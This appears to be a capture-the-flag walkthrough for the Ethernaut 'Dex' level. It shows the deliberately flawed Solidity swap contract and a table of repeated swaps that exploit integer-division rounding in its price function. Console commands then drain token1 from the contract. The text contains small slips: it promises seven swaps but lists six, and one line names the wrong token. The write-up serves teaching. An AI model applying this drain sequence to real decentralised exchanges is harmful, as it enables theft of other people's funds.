This is the level 22 of OpenZeppelin Ethernaut web3/solidity based game.
Pre-requisites
- ERC20 Token Standard
- Solidity division operation
Hack
Given contract:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';
contract Dex {
using SafeMath for uint;
address public token1;
address public token2;
constructor(address _token1, address _token2) public {
token1 = _token1;
token2 = _token2;
}
function swap(address from, address to, uint amount) public {
require((from == token1 && to == token2) || (from == token2 && to == token1), "Invalid tokens");
require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
uint swap_amount = get_swap_price(from, to, amount);
IERC20(from).transferFrom(msg.sender, address(this), amount);
IERC20(to).approve(address(this), swap_amount);
IERC20(to).transferFrom(address(this), msg.sender, swap_amount);
}
function add_liquidity(address token_address, uint amount) public{
IERC20(token_address).transferFrom(msg.sender, address(this), amount);
}
function get_swap_price(address from, address to, uint amount) public view returns(uint){
return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
}
function approve(address spender, uint amount) public {
SwappableToken(token1).approve(spender, amount);
SwappableToken(token2).approve(spender, amount);
}
function balanceOf(address token, address account) public view returns (uint){
return IERC20(token).balanceOf(account);
}
}
contract SwappableToken is ERC20 {
constructor(string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
_mint(msg.sender, initialSupply);
}
}
player
has to drain all of at least one of the two tokens - token1
and token2
from the contract.
The vulnerability originates from get_swap_price
method which determines the exchange rate between tokens in the Dex. The division in it won't always calculate to a perfect integer, but a fraction. And there is no fraction types in Solidity. Instead, division rounds towards zero. according to docs. For example, 3 / 2 = 1
in solidity.
We're going to swap all of our token1
for token2
. Then swap all our token2
to obtain token1
, then swap all our token1
for token2
and so on.
Here's how the price history & balances would go. Initially,
DEX | player
token1 - token2 | token1 - token2
----------------------------------
100 100 | 10 10
After swapping all of token1
:
DEX | player
token1 - token2 | token1 - token2
----------------------------------
100 100 | 10 10
110 90 | 0 20
Note that at this point exchange rate is adjusted. Now, exchanging 20 token2
should give 20 * 110 / 90 = 24.44..
. But since division results in integer we get 24 token2
. Price adjusts again. Swap again.
DEX | player
token1 - token2 | token1 - token2
----------------------------------
100 100 | 10 10
110 90 | 0 20
86 110 | 24 0
Notice that on each swap we get more of token1
or token2
than held before previous swap. This is due to the inaccuracy of price calculation in get_swap_price
method.
Keep swapping and we'll get:
DEX | player
token1 - token2 | token1 - token2
----------------------------------
100 100 | 10 10
110 90 | 0 20
86 110 | 24 0
110 80 | 0 30
69 110 | 41 0
110 45 | 0 65
Now, at the last swap above we've gotten hold of 65 token2
, which is more than enough to drain all of 110 token1
! By simple calculation, only 45 of token2
is required to get all 110 of token1
.
DEX | player
token1 - token2 | token1 - token2
----------------------------------
100 100 | 10 10
110 90 | 0 20
86 110 | 24 0
110 80 | 0 30
69 110 | 41 0
110 45 | 0 65
0 90 | 110 20
Jump into console. First approve the contract to transfer your tokens with a big enough allowance so that we don't have to approve again & again. Allowance of 500 should be more than enough:
await contract.approve(contract.address, 500)
Get token addresses:
t1 = await contract.token1()
t2 = await contract.token2()
Now perform 7 swaps corresponding to the table rows above one by one:
await contract.swap(t1, t2, 10)
await contract.swap(t2, t1, 20)
await contract.swap(t1, t2, 24)
await contract.swap(t2, t1, 30)
await contract.swap(t1, t2, 41)
await contract.swap(t2, t1, 45)
token1
is drained! Verify by:
await contract.balanceOf(t1, instance).then(v => v.toString())
// Output: '0'
This is it!
Learned something awesome? Consider starring the github repo π
and following me on twitter here π
Top comments (0)